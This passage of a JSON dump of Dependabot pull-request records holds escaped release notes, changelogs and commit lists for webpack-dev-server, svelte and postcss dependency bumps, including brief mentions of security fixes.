href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.2...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `svelte` from 4.2.20 to 5.55.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/releases\"\u003esvelte's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esvelte@5.55.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: unlink errored and otherwise finished batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18264\"\u003e#18264\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eperf: walk composedPath() directly in delegated event propagation (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18268\"\u003e#18268\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: transfer effects when merging batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18254\"\u003e#18254\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e$derived(await ...)\u003c/code\u003e in disconnected effect roots (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18273\"\u003e#18273\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: remove temporary raw-text hydration markers (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18269\"\u003e#18269\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: propagate async \u003ccode\u003e@const\u003c/code\u003e blockers through closure references so template expressions like \u003ccode\u003e{(() =\u0026gt; host)()}\u003c/code\u003e correctly wait for the awaited value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18309\"\u003e#18309\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: properly unlink batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18298\"\u003e#18298\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: settle discarded batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18290\"\u003e#18290\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: declare \u003ccode\u003elet:\u003c/code\u003e directives before \u003ccode\u003e{@const}\u003c/code\u003e declarations on slotted elements (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18271\"\u003e#18271\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resume outro-ed branches if they were kept around (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18291\"\u003e#18291\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18297\"\u003e#18297\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly coordinate component-level effects inside async blocks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18260\"\u003e#18260\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make unnecessary commit work less likely (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18263\"\u003e#18263\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: add tag name to \u003ccode\u003ea11y_click_events_have_key_events\u003c/code\u003e warning (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18272\"\u003e#18272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: catch rejected promises while merging/committing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18266\"\u003e#18266\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.55.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't unset batch when calling \u003ccode\u003e{#await ...}\u003c/code\u003e promise (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: promise-ify \u003ccode\u003e{#await await ...}\u003c/code\u003e expressions on the server and correctly hydrate them on the client (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: deduplicate dependencies that are added outside the init/update cycle (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid false-positive batch invariant error (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18246\"\u003e#18246\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: inline primitive constants in attribute values during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18232\"\u003e#18232\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.55.8\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix(print): handle \u003ccode\u003esvelte:body\u003c/code\u003e and fix keyframe percentage double-printing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18234\"\u003e#18234\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/blob/main/packages/svelte/CHANGELOG.md\"\u003esvelte's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.55.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: unlink errored and otherwise finished batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18264\"\u003e#18264\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eperf: walk composedPath() directly in delegated event propagation (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18268\"\u003e#18268\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: transfer effects when merging batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18254\"\u003e#18254\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e$derived(await ...)\u003c/code\u003e in disconnected effect roots (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18273\"\u003e#18273\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: remove temporary raw-text hydration markers (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18269\"\u003e#18269\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: propagate async \u003ccode\u003e@const\u003c/code\u003e blockers through closure references so template expressions like \u003ccode\u003e{(() =\u0026gt; host)()}\u003c/code\u003e correctly wait for the awaited value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18309\"\u003e#18309\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: properly unlink batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18298\"\u003e#18298\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: settle discarded batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18290\"\u003e#18290\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: declare \u003ccode\u003elet:\u003c/code\u003e directives before \u003ccode\u003e{@const}\u003c/code\u003e declarations on slotted elements (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18271\"\u003e#18271\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resume outro-ed branches if they were kept around (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18291\"\u003e#18291\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18297\"\u003e#18297\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly coordinate component-level effects inside async blocks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18260\"\u003e#18260\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make unnecessary commit work less likely (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18263\"\u003e#18263\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: add tag name to \u003ccode\u003ea11y_click_events_have_key_events\u003c/code\u003e warning (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18272\"\u003e#18272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: catch rejected promises while merging/committing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18266\"\u003e#18266\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.55.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't unset batch when calling \u003ccode\u003e{#await ...}\u003c/code\u003e promise (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: promise-ify \u003ccode\u003e{#await await ...}\u003c/code\u003e expressions on the server and correctly hydrate them on the client (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: deduplicate dependencies that are added outside the init/update cycle (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid false-positive batch invariant error (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18246\"\u003e#18246\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: inline primitive constants in attribute values during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18232\"\u003e#18232\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.55.8\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0bb715d3cfe51134756e79b6193dacccfa77361f\"\u003e\u003ccode\u003e0bb715d\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18255\"\u003e#18255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/49538608356eabc74fc182b03449112a4fa1f12d\"\u003e\u003ccode\u003e4953860\u003c/code\u003e\u003c/a\u003e chore: remove unused class property (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18307\"\u003e#18307\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/638ab370a561f97552229589f2f334655426fe5c\"\u003e\u003ccode\u003e638ab37\u003c/code\u003e\u003c/a\u003e fix: prevent batch unlinking twice (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18303\"\u003e#18303\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0da9f9e2ab515da16d624c5bc48b554beb179f92\"\u003e\u003ccode\u003e0da9f9e\u003c/code\u003e\u003c/a\u003e fix: disallow effect creation after \u003ccode\u003eawait\u003c/code\u003e (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18299\"\u003e#18299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/d4be4e297365030b5cbcb676bda133f2840816b2\"\u003e\u003ccode\u003ed4be4e2\u003c/code\u003e\u003c/a\u003e chore: ensure treeshaking test runs during CI (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18302\"\u003e#18302\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/e705369dee060e74ad9456e45824f36b1ee3c6cf\"\u003e\u003ccode\u003ee705369\u003c/code\u003e\u003c/a\u003e fix: propagate async \u003ca href=\"https://github.com/const\"\u003e\u003ccode\u003e@​const\u003c/code\u003e\u003c/a\u003e blockers through closure references (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18309\"\u003e#18309\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/ec08dbc7ee156d34816586feb49bb8650579e41f\"\u003e\u003ccode\u003eec08dbc\u003c/code\u003e\u003c/a\u003e fix: only unlink batch if we're done with it (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18298\"\u003e#18298\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/b40c359d44196b7b87745259243333763ed61ec5\"\u003e\u003ccode\u003eb40c359\u003c/code\u003e\u003c/a\u003e fix: don't assume boundary exists during increment/decrement (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18289\"\u003e#18289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/c01e598fff2a851323fb61c6325ef51b87f019fd\"\u003e\u003ccode\u003ec01e598\u003c/code\u003e\u003c/a\u003e fix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18297\"\u003e#18297\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/070a0c4f7708ae0caa209ff762d98c0f117e6adb\"\u003e\u003ccode\u003e070a0c4\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;perf: use Set instead of Array for constant lookups in...\n\n_Description has been truncated_","html_url":"https://github.com/dporkka/platform/pull/31","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/dporkka%2Fplatform/issues/31","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/31/packages"},{"uuid":"4544459458","node_id":"PR_kwDOMmpB9c7gcHFl","number":238,"state":"open","title":"build(deps): bump the npm_and_yarn group across 1 directory with 6 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-28T23:15:16.000Z","updated_at":"2026-05-28T23:16:29.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"npm_and_yarn","update_count":6,"packages":[{"name":"postcss","old_version":"8.5.6","new_version":"8.5.10","repository_url":"https://github.com/postcss/postcss"},{"name":"webpack-dev-server","old_version":"5.2.2","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"@babel/plugin-transform-modules-systemjs","old_version":"7.29.0","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"fast-uri","old_version":"3.1.0","new_version":"3.1.2","repository_url":"https://github.com/fastify/fast-uri"},{"name":"follow-redirects","old_version":"1.15.11","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 5 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [postcss](https://github.com/postcss/postcss) | `8.5.6` | `8.5.10` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.2` | `5.2.4` |\n| [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs) | `7.29.0` | `7.29.7` |\n| [fast-uri](https://github.com/fastify/fast-uri) | `3.1.0` | `3.1.2` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.11` | `1.16.0` |\n\n\nUpdates `postcss` from 8.5.6 to 8.5.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/releases\"\u003epostcss's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt 